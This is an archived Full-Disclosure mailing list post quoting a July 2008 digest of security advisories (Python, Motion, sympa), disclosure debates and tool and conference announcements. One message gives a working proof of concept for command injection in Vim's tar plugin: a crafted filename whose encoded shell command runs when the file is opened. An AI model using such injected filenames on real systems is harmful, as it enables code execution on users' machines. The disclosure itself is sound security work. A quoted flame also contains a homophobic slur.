Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Full-Disclosure Digest, Vol 41, Issue 3
From: badr muhyeddin <gigiyousef () hotmail com>
Date: Wed, 2 Jul 2008 14:15:35 +0300


From: full-disclosure-request () lists grok org uk> Subject: Full-Disclosure Digest, Vol 41, Issue 3> To: 
full-disclosure () lists grok org uk> Date: Wed, 2 Jul 2008 12:00:01 +0100> > Send Full-Disclosure mailing list 
submissions to> full-disclosure () lists grok org uk> > To subscribe or unsubscribe via the World Wide Web, visit> 
https://lists.grok.org.uk/mailman/listinfo/full-disclosure> or, via email, send a message with subject or body 'help' 
to> full-disclosure-request () lists grok org uk> > You can reach the person managing the list at> 
full-disclosure-owner () lists grok org uk> > When replying, please edit your Subject line so it is more specific> 
than "Re: Contents of Full-Disclosure digest..."> > > Note to digest recipients - when replying to digest posts, 
please trim your post appropriately. Thank you.> > > Today's Topics:> > 1. [ GLSA 200807-01 ] Python: Multiple 
integer overflows> (Tobias Heinlein)> 2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code> (Tobias Heinlein)
3. Alphanumeric shellcode improvements (Berend-Jan Wever)> 4. Re: [SCANIT-2008-001] QNX phgrafx Privilege 
Escalation> Vulnerability (mrdkaaa () stream cz)> 5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1> ( 
Jan Min?? )> 6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of> service (Steve Kemp)> 7. [tool] ratproxy - 
passive web application security assessment> tool (Michal Zalewski)> 8. Re: [SCANIT-2008-001] QNX phgrafx Privilege 
Escalation> Vulnerability (Filipe Balestra)> 9. Re: Full-Disclosure? introducing lul-disclosure.> (Tonnerre 
Lombard)> 10. Deepsec Talks 2007 are online - registration for 2008 is open> (DeepSec 2008)> 11. Re: 
Full-Disclosure? introducing lul-disclosure. (root)> > > 
----------------------------------------------------------------------> > Message: 1> Date: Tue, 01 Jul 2008 
13:51:43 +0200> From: Tobias Heinlein <keytoaster () gentoo org>> Subject: [Full-disclosure] [ GLSA 200807-01 ] 
Python: Multiple integer> overflows> To: gentoo-anno
 unce () gentoo org> Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,> security-alerts () 
linuxsecurity com> Message-ID: <486A1A4F.1080404 () gentoo org>> Content-Type: text/plain; charset="utf-8"> > - - - - - 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo Linux Security Advisory GLSA 200807-01> - - - - - 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - 
- - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal> Title: Python: Multiple integer overflows> Date: July 
01, 2008> Bugs: #216673, #217221> ID: 200807-01> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
- -> > Synopsis> ========> > Multiple integer overflows may allow for Denial of Service.> > Background> ==========> > 
Python is an interpreted, interactive, object-oriented programming> language.> > Affected packages> =================> 
-------------------------------------------------------
 ------------> Package / Vulnerable / Unaffected> -------------------------------------------------------------------> 
1 dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6> >= 2.4.4-r13> > Description> ===========> > Multiple vulnerabilities were 
discovered in Python:> > * David Remahl reported multiple integer overflows in the file> imageop.c, leading to a 
heap-based buffer overflow (CVE-2008-1679).> This issue is due to an incomplete fix for CVE-2007-4965.> > * Justin 
Ferguson discovered that an integer signedness error in the> zlib extension module might trigger insufficient memory 
allocation> and a buffer overflow via a negative signed integer (CVE-2008-1721).> > * Justin Ferguson discovered that 
insufficient input validation in> the PyString_FromStringAndSize() function might lead to a buffer> overflow 
(CVE-2008-1887).> > Impact> ======> > A remote attacker could exploit these vulnerabilities to cause a Denial> of 
Service or possibly the remote execution of arbitrary code with the
privileges of the user running Python.> > Workaround> ==========> > There is no known workaround at this time.> > 
Resolution> ==========> > The imageop module is no longer built in the unaffected versions.> > All Python 2.3 users 
should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose 
">=dev-lang/python-2.3.6-r6"> > All Python 2.4 users should upgrade to the latest version:> > # emerge --sync> # 
emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"> > References> ==========> > [ 1 ] CVE-2008-1679> 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679> [ 2 ] CVE-2008-1721> 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721> [ 3 ] CVE-2008-1887> 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887> > Availability> ============> > This GLSA and any 
updates to it are available for viewing at> the Gentoo Security Website:> > 
http://security.gentoo.org/glsa/glsa-200807-01.xml> > Concerns?> =========> > Security 
 is a primary focus of Gentoo Linux and ensuring the> confidentiality and security of our users machines is of utmost> 
importance to us. Any security concerns should be addressed to> security () gentoo org or alternatively, you may file a 
bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008 Gentoo Foundation, Inc; referenced text> belongs 
to its owner(s).> > The contents of this document are licensed under the> Creative Commons - Attribution / Share Alike 
license.> > http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part --------------> A non-text 
attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP 
digital signature> Url : 
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin > > 
------------------------------> > Message: 2> Date: Tue, 01 Jul 2008 13:59:36 +0200> From: Tobias Heinlein <keytoaster 
() gentoo org>> Subject: [Full-disclosure] [
  GLSA 200807-02 ] Motion: Execution of> arbitrary code> To: gentoo-announce () gentoo org> Cc: full-disclosure () 
lists grok org uk, bugtraq () securityfocus com,> security-alerts () linuxsecurity com> Message-ID: <486A1C28.3010409 
() gentoo org>> Content-Type: text/plain; charset="utf-8"> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
- - - - - - -> Gentoo Linux Security Advisory GLSA 200807-02> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
- - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > 
Severity: Normal> Title: Motion: Execution of arbitrary code> Date: July 01, 2008> Bugs: #227053> ID: 200807-02> > - - 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Synopsis> ========> > Multiple vulnerabilities 
in Motion might result in the execution of> arbitrary code.> > Background> ==========> > Motion is a program that 
monitors the video signal from one or more> cameras and is able
  to detect motions.> > Affected packages> =================> > 
-------------------------------------------------------------------> Package / Vulnerable / Unaffected> 
-------------------------------------------------------------------> 1 media-video/motion < 3.2.10.1 >= 3.2.10.1> > 
Description> ===========> > Nico Golde reported an off-by-one error within the read_client()> function in the 
webhttpd.c file, leading to a stack-based buffer> overflow. Stefan Cornelius (Secunia Research) reported a boundary 
error> within the same function, also leading to a stack-based buffer> overflow. Both vulnerabilities require that the 
HTTP Control interface> is enabled.> > Impact> ======> > A remote attacker could exploit these vulnerabilities by 
sending an> overly long or specially crafted request to a vulnerable Motion HTTP> control interface, possibly resulting 
in the execution of arbitrary> code with the privileges of the motion user.> > Workaround> ==========> > There is no 
known work
 around at this time.> > Resolution> ==========> > All Motion users should upgrade to the latest version:> > # emerge 
--sync> # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"> > References> ==========> > [ 1 ] 
CVE-2008-2654> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654> > Availability> ============> > This GLSA 
and any updates to it are available for viewing at> the Gentoo Security Website:> > 
http://security.gentoo.org/glsa/glsa-200807-02.xml> > Concerns?> =========> > Security is a primary focus of Gentoo 
Linux and ensuring the> confidentiality and security of our users machines is of utmost> importance to us. Any security 
concerns should be addressed to> security () gentoo org or alternatively, you may file a bug at> 
http://bugs.gentoo.org.> > License> =======> > Copyright 2008 Gentoo Foundation, Inc; referenced text> belongs to its 
owner(s).> > The contents of this document are licensed under the> Creative Commons - Attribution / Share Alike 
 license.> > http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part --------------> A non-text 
attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP 
digital signature> Url : 
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin > > 
------------------------------> > Message: 3> Date: Tue, 1 Jul 2008 14:18:34 +0200> From: "Berend-Jan Wever" 
<berendjanwever () gmail com>> Subject: [Full-disclosure] Alphanumeric shellcode improvements> To: full-disclosure () 
lists grok org uk> Message-ID:> <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9 () mail gmail com>> Content-Type: 
text/plain; charset="iso-8859-1"> > Hi all,> > I've not had as much opportunity in the last three years to contribute, 
but> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,> the upcoming new version of my 
alphanumeric shellcode encoder:> * I've reduced the size of the mixedca
 se ascii decoder:> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86> * I've 
created a lowercase ascii decoder:> 
http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86> * I've created a mixedcase 
ascii decoder for x64:> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64> See 
http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and> some documentation.> > Cheers,> SkyLined> > -- 
Berend-Jan "SkyLined" Wever> Email & Live messenger: berendjanwever () gmail com> --> 'The historical abuses of new 
data occurred between the time that a few> people learned the important thing and the time when that important thing> 
became general knowledge. To the Gowachin and to BuSab it was the "Data> Gap," a source of constant danger.'> -- Frank 
Herbert, 'The Dosadi Experiment'> -------------- next part --------------> An HTML attachment was scrubbed...> URL: 
http://lists
 .grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html > > 
------------------------------> > Message: 4> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)> From: mrdkaaa () stream cz> 
Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege> Escalation Vulnerability> To: full-disclosure 
() lists grok org uk> Message-ID: <4.4-28953-1047754371-1214923194 () stream cz>> Content-Type: text/plain; 
charset="us-ascii"> > This vulnerability is at least two years old. Anyway, what's the point of releasing> a security 
advisory for a vendor well known to never going to patch it?> > > > ------------------------------> > Message: 5> Date: 
Tue, 1 Jul 2008 20:36:29 +0100> From: " Jan Min?? " <rdancer () rdancer org>> Subject: Re: [Full-disclosure] Collection 
of Vulnerabilities in Fully> Patched Vim 7.1> To: full-disclosure () lists grok org uk, bugtraq () securityfocus com,> 
vim_dev () googlegroups com, "Bram Moolenaar" <Bram () moolenaar net>> Cc: bugs () vim org> Message
 -ID:> <6edf76c20807011236t7f96955h924c2692705b6ff4 () mail gmail com>> Content-Type: text/plain; charset=UTF-8> > On 
Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:> >> > Jan Minar wrote:> >> >> 1. Summary> 
Product : Vim -- Vi IMproved> >> Version : Tested with 7.1.314 and 6.4> >> Impact : Arbitrary code execution> >> 
Wherefrom: Local and remote> >> Original : http://www.rdancer.org/vulnerablevim.html> >>> >> Improper quoting in some 
parts of Vim written in the Vim Script can lead to> >> arbitrary code execution upon opening a crafted file.> > > Note 
that version 7.1.314, as reported in the Summary, does not have> > most of the reported problems. The problems in the 
plugins have also> > been fixed, this requires updating the runtime files. Information about> > that can be found at 
http://www.vim.org/runtime.php> > I do apologize: as written in the advisory, the version I worked with> was 7.1.298. 
7.1.314 was only partly vulnerable. FWIW, I have> 
 updated the advisory at http://www.rdancer.orgvulnerablevim.html .> > Thanks to Bram for all the good work.> > 7.2a.10 
with updated runtime is still vulnerable to the zipplugin> attack, and an updated tarplugin attack:> > 
-------------------------------------------> -------- Test results below ---------------> 
-------------------------------------------> filetype.vim> strong : EXPLOIT FAILED> weak : EXPLOIT FAILED> tarplugin : 
EXPLOIT FAILED> tarplugin.updated: VULNERABLE> zipplugin : VULNERABLE> xpm.vim> xpm : EXPLOIT FAILED> xpm2 : EXPLOIT 
FAILED> remote : EXPLOIT FAILED> gzip_vim : EXPLOIT FAILED> netrw : EXPLOIT FAILED> > The original tarplugin exploit 
now produces a string of telling error messages:> > /bin/bash: so%: command not found> tar: 
/home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:> Cannot open: No such file or directory> tar: Error is not 
recoverable: exiting now> /bin/bash: retu: command not found> /bin/bash: bar.tar|retu|'bar.tar: command not found>
  > It's easy to see that it is still possible to execute arbitrary shell commands.> > $VIMRUNTIME/autoload/tar.vim of 
Vim 7.2a.10:> > 136 if tarfile =~# '\.\(gz\|tgz\)$'> 137 " call Decho("1: exe silent r! gzip -d -c> 
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *138 exe "silent r! gzip -d -c -- 
".s:Escape(tarfile)." |> ".g:tar_cmd." -".g:tar_browseoptions." - "> 139 elseif tarfile =~# '\.lrp'> 140 " call 
Decho("2: exe silent r! cat --> ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."> -".g:tar_browseoptions." - ")> *141 
exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c> -|".g:tar_cmd." -".g:tar_browseoptions." - "> 142 elseif 
tarfile =~# '\.bz2$'> 143 " call Decho("3: exe silent r! bzip2 -d -c> ".s:Escape(tarfile)." | ".g:tar_cmd." 
-".g:tar_browseoptions." - ")> *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd." 
-".g:tar_browseoptions." - "> 145 else> 146 " call Decho("4: exe silent r! ".g:tar_cmd."> -".g:tar_browseoptions
 ." ".s:Escape(tarfile))> **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."> ".s:Escape(tarfile)> [...]> 444 
fun s:Escape(name)> 445 " shellescape() was added by patch 7.0.111> 446 if exists("*shellescape")> 447 let qnameq= 
shellescape(a:name)> 448 else> 449 let qnameq= g:tar_shq . a:name . g:tar_shq> 450 endif> 451 return qnameq> 452 
endfun> > (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.> > (**) tar(1) allows arbitrary 
command execution via options ``--to-command'',> and ``--use-compress-program''.> > > The updated tarplugin attack is 
rather simple:> > $ rm -rf ./*> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |> xxd -r\`;'bar.tar"> $ vim 
+:q ./foo*> $ ls -l pwned> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned> > Cheers,> Jan Minar.> > > > 
------------------------------> > Message: 6> Date: Tue, 1 Jul 2008 21:25:39 +0100> From: Steve Kemp <skx () debian 
org>> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa 
 packages> fix denial of service> To: debian-security-announce () lists debian org> Message-ID: <20080701202539.GA32605 
() steve org uk>> Content-Type: text/plain; charset=us-ascii> > -----BEGIN PGP SIGNED MESSAGE-----> Hash: SHA1> > - 
------------------------------------------------------------------------> Debian Security Advisory DSA-1600-1 security 
() debian org> http://www.debian.org/security/ Steve Kemp> July 01, 2008 http://www.debian.org/security/faq> - 
------------------------------------------------------------------------> > Package : sympa> Vulnerability : dos> 
Problem type : remote> Debian-specific: no> CVE Id(s) : CVE-2008-1648> Debian Bug : 475163> > It was discovered that 
sympa, a modern mailing list manager, would> crash when processing certain types of malformed messages.> > For the 
stable distribution (etch), this problem has been fixed in version> 5.2.3-1.2+etch1.> > For the unstable distribution 
(sid), this problem has been fixed in> version 5.3.4-4.> > We recomme
 nd that you upgrade your sympa package.> > > Upgrade instructions> - --------------------> > wget url> will fetch the 
file for you> dpkg -i file.deb> will install the referenced file.> > If you are using the apt-get package manager, use 
the line for> sources.list as given below:> > apt-get update> will update the internal database> apt-get upgrade> will 
install corrected packages> > You may use an automated update by adding the resources from the> footer to the proper 
configuration.> > > Debian GNU/Linux 4.0 alias etch> - -------------------------------> > Source archives:> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc> Size/MD5 checksum: 625 
c7e720e56b1c4e9778cea822ed150a19> http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz> 
Size/MD5 checksum: 96804 a93d8ec3dcbc0a0aed99e513c5749c0e> 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz> Size/MD5 checksum: 5102528 
355cb9174841205831191
 c93a83da895> > alpha architecture (DEC Alpha)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb> Size/MD5 checksum: 3589148 
26b92215ed7b17531c3702ff76b30901> > amd64 architecture (AMD x86_64 (AMD64))> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb> Size/MD5 checksum: 3591854 
531781d522ad5f02e6c5b658883ed37d> > arm architecture (ARM)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb> Size/MD5 checksum: 3590606 
dc3437760b7db4761f90e992e3638c52> > hppa architecture (HP PA RISC)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb> Size/MD5 checksum: 3591482 
5601933860831577cb017cb0aa3b31fe> > i386 architecture (Intel ia32)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb> Size/MD5 checksum: 3567454 
0c6e3d6046f7d0e9920ed7ce9780b103> > ia64 architecture (Intel ia64)> > http://security.debian.org/p
 ool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb> Size/MD5 checksum: 3571256 c294184494968264ff0857fc2b907711> 
mips architecture (MIPS (Big Endian))> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb> Size/MD5 checksum: 3584362 
1b3371fe22966b198a3c338167e71909> > powerpc architecture (PowerPC)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb> Size/MD5 checksum: 3568314 
57c566c13cd31f66bbe3652b4c9ea3e7> > s390 architecture (IBM S/390)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb> Size/MD5 checksum: 3568574 
afab57a71590dcdd685746b6500040b0> > sparc architecture (Sun SPARC/UltraSPARC)> > 
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb> Size/MD5 checksum: 3568016 
0bf312e31bb5df28404ea40842845caf> > > These files will probably be moved into the stable distribution on> its next 
update.> > - ----------------------------
 -----------------------------------------------------> For apt-get: deb http://security.debian.org/ stable/updates 
main> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main> Mailing list: 
debian-security-announce () lists debian org> Package info: `apt-cache show <pkg>' and 
http://packages.debian.org/<pkg>> -----BEGIN PGP SIGNATURE-----> Version: GnuPG v1.4.6 (GNU/Linux)> > 
iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S> 6REh7OX9zxqgWYGHqQWtEpQ=> =ANTa> -----END PGP 
SIGNATURE-----> > > > ------------------------------> > Message: 7> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)> From: 
Michal Zalewski <lcamtuf () dione cc>> Subject: [Full-disclosure] [tool] ratproxy - passive web application> security 
assessment tool> To: bugtraq () securityfocus com, websecurity () webappsec org> Cc: full-disclosure () lists grok org 
uk> Message-ID: <Pine.LNX.4.64.0807012124130.17434 () dione cc>> Content-Type: TEXT/PLAIN; charset=US-ASCII; 
format=flowed> > Hi all
 ,> > I am happy to announce that we've just open sourced ratproxy - a free, > passive web security assessment tool. 
This utility is designed to > transparently analyze legitimate, browser-driven interactions with tested > web 
applications - and automatically pinpoint, annotate, and prioritize > potential flaws or areas of concern on the fly.> 
The proxy analyzes problems such as cross-site script inclusion threats, > insufficient cross-site request forgery 
defenses, caching issues, > potentially unsafe cross-domain code inclusion schemes and information > leakage scenarios, 
and much more.> > For a detailed discussion of the utility, please visit:> 
http://code.google.com/p/ratproxy/wiki/RatproxyDoc> > Source code is available at:> 
http://code.google.com/p/ratproxy/downloads/list> > And finally, screenshot of a sample report can be found here:> 
http://lcamtuf.coredump.cx/ratproxy-screen.png> > The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). 
Since > it is in
  beta, there might be some kinks to be ironed out, and not all web > technologies might be properly accounted for. 
Feedback is appreciated.> > Please keep in mind that the proxy is meant to highlight interesting > patterns in web 
applications; a further analysis by a security > professional is required to interpret the significance of results for 
a > particular platform.> > Cheers,> /mz> > > > ------------------------------> > Message: 8> Date: Wed, 2 Jul 2008 
02:19:01 -0300> From: "Filipe Balestra" <filipe () balestra com br>> Subject: Re: [Full-disclosure] [SCANIT-2008-001] 
QNX phgrafx Privilege> Escalation Vulnerability> To: <full-disclosure () lists grok org uk>> Message-ID: 
<BEDD65A8CCD54B3BAA75664A0D440A93 () 123PC>> Content-Type: text/plain; charset="iso-8859-1"> > mrdkaaa,> > are you 
saying that this vulnerability is not new to the public?> > The program phgrafx had some vulnerabilities published, but 
this one is not the same of any other that I can find in securityfocus. One
  program can have a lot of vulnerabilities :) > > But yes, this vulnerability is at least four years old, but was not 
public.> > Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we 
are advising the customers, they can choose or not the company. If you are a customer you probably would like to know 
about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to 
release it. Whatever, why hold it?> > p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal 
opinion, not a company official position. If you want to know about the company vulnerability release process or any 
other information, please, contact the Scanit R&D team.> > Cheers,> > Filipe Alcarde Balestra> -------------- next part 
--------------> An HTML attachment was scrubbed...> URL: 
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html > > -
 -----------------------------> > Message: 9> Date: Wed, 2 Jul 2008 08:29:43 +0200> From: Tonnerre Lombard 
<tonnerre.lombard () sygroup ch>> Subject: Re: [Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To: 
staff () lul-disclosure net> Cc: full-disclosure () lists grok org uk> Message-ID: <20080702082943.2811aba5 () wssyg117 
sygroup-int ch>> Content-Type: text/plain; charset="iso-8859-1"> > Salut,> > On Mon, 30 Jun 2008 21:57:29 -0400, staff 
wrote:> > Are you ready for a site that isn't full of fagottry? Where Gadi cant> > steal your money or eat your 
lunches? Where you can freely submit> > lulz to be published? Where Theo's defeat and denial are brought to> > light? 
Wait no more!> > You mean a site which evidently cannot tell the difference between> local and remote root 
vulnerabilities? (The local root exploit for> obsd4 which is published on that site contains a patch to increment the> 
count of _remote_ vulnerabilities on the obsd web site.)> > Tonnerre> -- > SyGroup G
 mbH> Tonnerre Lombard> > Solutions Systematiques> Tel:+41 61 333 80 33 G?terstrasse 86> Fax:+41 61 383 14 67 4053 
Basel> Web:www.sygroup.ch tonnerre.lombard () sygroup ch> -------------- next part --------------> A non-text 
attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 835 bytes> Desc: not available> 
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin > > 
------------------------------> > Message: 10> Date: Tue, 01 Jul 2008 21:47:36 +0200> From: DeepSec 2008 <deepsec () 
deepsec net>> Subject: [Full-disclosure] Deepsec Talks 2007 are online -> registration for 2008 is open> To: 
full-disclosure () lists grok org uk> Message-ID: <486A89D8.2000303 () deepsec net>> Content-Type: text/plain; 
charset=UTF-8; format=flowed> > Dear Madam, dear Sir,> > DeepSec Vienna, the annual In-Depth Security Conference has 
opened> online registrations for 2008. Registrations will receive a discount> of 5% off the 
 regular fees until August 31st if you use the following> promotional code: earlybird-L4KZIEUE on our online 
registration form> at https://deepsec.net/register/> > Videos from 2007 are online:> > Also we are happy to announce 
that talks from last years conference> are online. Listen to last years talks in full length at:> 
http://video.google.com/videosearch?q=deepsec&sitesearch=#> > Call for Papers still Open for two weeks:> > If you have 
some good ideas for a Talk at the conference and haven't> decided yet to submit we encourage you to do so now. We still 
accept> submissions at https://deepsec.net/cfp/ or via e-mail to:> cfp () deepsec net> > > We hope to hear from you and 
of course to meet in Vienna in November!> > Best Regards,> > Paul B?hm,> Ren? Pfeiffer,> Michael Kafka> DeepSec GmbH> > 
-- > DeepSec In-Depth Security Conference> November 11nd to 14th 2008, Vienna, Austria> https://deepsec.net/> > > > 
------------------------------> > Message: 11> Date: Wed, 02 Jul 2008 04
 :08:38 -0300> From: root <root_ () fibertel com ar>> Subject: Re: [Full-disclosure] Full-Disclosure? introducing> 
lul-disclosure.> To: staff () lul-disclosure net> Cc: full-disclosure () lists grok org uk> Message-ID: 
<486B2976.8000708 () fibertel com ar>> Content-Type: text/plain; charset=ISO-8859-1; format=flowed> > You couldn't do 
the remote exploit even with a google video documenting > it step by step.> More like fail-disclosure.> > staff wrote:> 
Are you ready for a site that isn't full of fagottry? Where Gadi cant steal> > your money or eat your lunches? Where 
you can freely submit lulz to be> > published? Where Theo's defeat and denial are brought to light? Wait no> > more!> > 
http://lul-disclosure.net/> > > > WhiteHat? BlackHat? We are lulzhat.> > Fuck you and your hats.> > > > > > > > 
------------------------------------------------------------------------> > > > 
_______________________________________________> > Full-Disclosure - We believe in it.> > Charter: http://list
 s.grok.org.uk/full-disclosure-charter.html> > Hosted and sponsored by Secunia - http://secunia.com/> > > > 
------------------------------> > _______________________________________________> Full-Disclosure - We believe in it.> 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/> 
End of Full-Disclosure Digest, Vol 41, Issue 3> **********************************************unsubscribe
 
_________________________________________________________________
Invite your mail contacts to join your friends list with Windows Live Spaces. It's easy!
http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Re: Full-Disclosure Digest, Vol 41, Issue 3 badr muhyeddin (Jul 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault